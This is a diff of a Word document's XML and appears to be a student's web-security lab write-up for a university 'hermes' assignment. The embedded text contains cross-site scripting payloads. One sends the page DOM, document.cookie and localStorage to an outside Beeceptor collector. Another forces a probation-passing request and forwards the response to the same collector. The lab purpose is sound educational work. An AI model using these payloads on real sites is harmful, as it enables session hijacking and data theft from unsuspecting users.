               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12587,7 +12424,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12606,21 +12443,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12628,270 +12462,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>dom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>serializer.serializeToString</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>document.cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>JSON.stringify</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhttp.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13008,7 +12579,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15" cstate="print">
+                          <a:blip r:embed="rId19" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13130,7 +12701,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId16"/>
+                          <a:blip r:embed="rId20"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13170,7 +12741,7 @@
               </w:rPr>
               <w:t xml:space="preserve">isiting </w:t>
             </w:r>
-            <w:hyperlink r:id="rId17" w:history="1">
+            <w:hyperlink r:id="rId21" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -13247,7 +12818,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13264,9 +12834,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13274,7 +12843,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t>xss</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13283,7 +12852,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xss</w:t>
+              <w:t>_1</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13292,57 +12861,57 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>_1</w:t>
-            </w:r>
-            <w:r>
+              <w:t>.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13350,20 +12919,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13371,19 +12938,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13391,7 +12957,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13410,10 +12976,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13421,10 +12985,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13432,7 +12994,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
+              <w:t>this.responseText);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13451,20 +13013,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13472,187 +13032,26 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13732,21 +13131,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xiandew</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>”</w:t>
+              <w:t>the user “xiandew”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13795,1167 +13180,6 @@
                   <wp:extent cx="1679663" cy="435907"/>
                   <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                   <wp:docPr id="6" name="Picture 6"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId18"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1735839" cy="450486"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>In the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:noProof/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D8B95B" wp14:editId="0281254E">
-                  <wp:extent cx="1678189" cy="767443"/>
